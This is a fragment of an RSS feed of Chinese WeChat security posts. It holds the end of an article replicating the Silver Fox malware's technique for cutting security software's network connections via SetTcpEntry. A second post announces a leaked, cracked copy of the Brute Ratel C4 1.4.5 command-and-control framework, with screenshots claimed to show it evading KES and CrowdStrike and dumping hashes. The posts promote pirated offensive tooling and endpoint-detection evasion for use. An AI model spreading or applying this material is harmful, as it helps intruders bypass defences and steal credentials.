Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">现在运行一会儿观察一下</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:311.8900146484375px;" class="rich_pages wxw-img" data-ratio="0.5569422776911076" data-w="1923" src="https://wechat2rss.xlab.app/img-proxy/?k=ea828a4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXyCMc4xKIs3vasuRjgzUH15pc0ffYz4Rm18zloEicL7Q3lHwK5MrpJeg%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">很好一切正常</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><img style="width:560.010009765625px;height:318.3999938964844px;" class="rich_pages wxw-img" data-ratio="0.5685654008438819" data-w="1896" src="https://wechat2rss.xlab.app/img-proxy/?k=21f46011&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXG0tg4U9kgb46c469XANU5p8c7kO6lG3G3C4jOLsRabichM7HRjCSKlA%2F640%3Fwx_fmt%3Dpng"/></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">现在我们就拥有了一个最底层的 SetTcpEntry ，规避的能力也大大的提升。其实根据这些东西都可以得出一个结论，但是我不说，其实还有更底层更巧妙地办法，答案在 计算机网络 中。自行学习思考。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">至于更多的武器化我已经无心去看，睡觉！</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">本文来自可以遐想的碎碎念（公开内容）</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=3a041da9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXibFA8hkc3eesg3WCt1Lib5QFbeSW9aLcdCOaWv2sOWZhbJpyiaFIHweicg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=57a5b5e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXaKiar62wd3QM9jibBaFM6VyyC9b6Fj1OI0Pv3kjMZ5DxLJb6xoLEcXibg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=7e37df04&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXzUIxTMfAkz5DkialyXIj3ibxX1TicE3yHVicRagyFL4dvEK1dibiaUGiaZGTw%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=efb9e12a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXrkib1ZnibXhSXJpGFdy77vibhMjMjutkKBtF2ArxW6f6EHXex7KVXdTMA%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=1bc745f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXtaFfL0ocLQj6wZwy1xn4ibQ3dh0ZTmVIeTJwiaeiaye32mhGXZsUyHyMg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c7c4253b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXicMIXbuvM1DcZ6bhOlqnywxKdC0WbzCFmajZs9OYpHa5xypn0BEzIYQ%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5209ec43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXicm973n2WIQrIL73Ne91tOXKy2jJL8X27ZDyo472yKmkhicz8OB1MAZA%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9e77fe01&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXrhb0ib0cE70JiahSwsibxcw2iaWgtdu4L9owCDrfZ5APxjtg70Xpdp5A7A%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=b3932b4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXIvQRia8JibxrvArRKnicY8iaQiaIiaGKGLchDBGU4KVic4H65ib7JWg29nMlmQ%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=224e6eda&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXnNb7fiacHhU9JZqvPtAO8XAEP5XnibVZHFbF560CqHldvngLl7I28vsw%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=6c686be9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXY5lH6eV2jO5XLfwFXltkYp0KAFmKfX0BJzovEDBWTaFF4IUwrwQDog%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=b25a8f90&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXqm6Q24VYEwsibfoppPkfl7fxmZe4vtOby5tUZPLiauHo9yYlLiaaCAGRg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=ea828a4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXyCMc4xKIs3vasuRjgzUH15pc0ffYz4Rm18zloEicL7Q3lHwK5MrpJeg%2F640%3Fwx_fmt%3Dpng"/></p>
<p><img src="https://wechat2rss.xlab.app/img-proxy/?k=21f46011&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9cM4QgB2vEjiaSUaaPxjw9XXG0tg4U9kgb46c469XANU5p8c7kO6lG3G3C4jOLsRabichM7HRjCSKlA%2F640%3Fwx_fmt%3Dpng"/></p>



<p><a href="2247484232">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f7476f7e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484232%26idx%3D1%26sn%3D2be8425dcb8ff7cba1c53e97966c23c8">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 06 Jun 2025 00:13:00 +0800</pubDate>
    </item>
    <item>
      <title>41大事件！BRC4破解版/41内部edr&amp;xdr靶场对外开放</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484214&amp;idx=1&amp;sn=c33373076ebf836bb02269f1a1663002</link>
      <description>各位安全圈同僚，还在用着被标记到烂的cs吗？还在捧着个破cs当宝贝吗？抬头看看天吧。</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2024-06-28 00:34</span> <span style="display: inline-block;">安徽</span>
</p>

<p>各位安全圈同僚，还在用着被标记到烂的cs吗？还在捧着个破cs当宝贝吗？抬头看看天吧。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=29caba2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyUGeHibEziayPEKA5DGhU961jIeDUWXlmicnPZZemw7RQp0icEbibgej0b0g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">各位安全圈同僚，还在用着被标记到烂的cs吗？还在捧着个破cs当宝贝吗？抬头看看天吧。<br/></span></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">BRC</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">4</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">官方最新版虽然已经更新到了</span><span style="font-family:等线;">2</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">.0</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">，但是历史上仅泄露过</span><span style="font-family:等线;">1</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">.2.2</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">版本</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;"><br/></span></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">虽然</span><span style="font-family:等线;">1</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">.4.5</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">版本已经时隔了一年多，但是规避能力依旧很感人。</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">1.2</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">到</span><span style="font-family:等线;">1</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">.4</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">版本更新了一些很重要的核心功能</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">1、内存加载PE文件</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">2、支持UDP的socks</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">5</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">3</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">、</span><span style="font-family:等线;">Sleep的规避能力加强</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">4、反向端口转发</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">5、更可控的配置</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">本次为</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">BRC4 1.4.5</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">版本泄露，已经经过我家大宝贝破解实现使用自由</span><span style="font-family:等线;">~<br/></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000550" data-ratio="0.5968712394705175" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=478d8da7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEy7iadYTD45EZWKnkJLYBR8ViaU66ibtbXK7crT7hibupNib65vpcGDNhdAUw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">上线</span><span style="font-family:等线;">KES测试:</span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000551" data-ratio="0.1648616125150421" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=c66b7926&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEynjicPx2ELqkuQFMXovNvupD3iaYEZiaGiafHT2ibjf0pUDeLYkCJoBrfic2w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">内存扫描<br/></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000553" data-ratio="0.5631768953068592" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=ae08a23f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEydxEf3dosHHKzOGSgTHFjm8NT8QfNoC30LYicGEnzM7khEMxWDNXqADQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;"><mpchecktext><br/></mpchecktext></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">H</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">ash获取<br/></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000554" data-ratio="0.41034897713598073" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=af99983c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyTYRPC4LuuwjCbyCmoKwfz4cYaJtclBiaNibJqZU1iaqBATia60HicoKn91w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">截图：</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000555" data-ratio="0.2611311672683514" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=98cd630a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEylyojV5iaM8lziahCYryw8ZtgfFvuTByicbnTE0XA1RhcMxOkBupDxsoEA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">上线</span><span style="font-family:等线;">Crowd</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">Strike</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">测试：</span></span><span 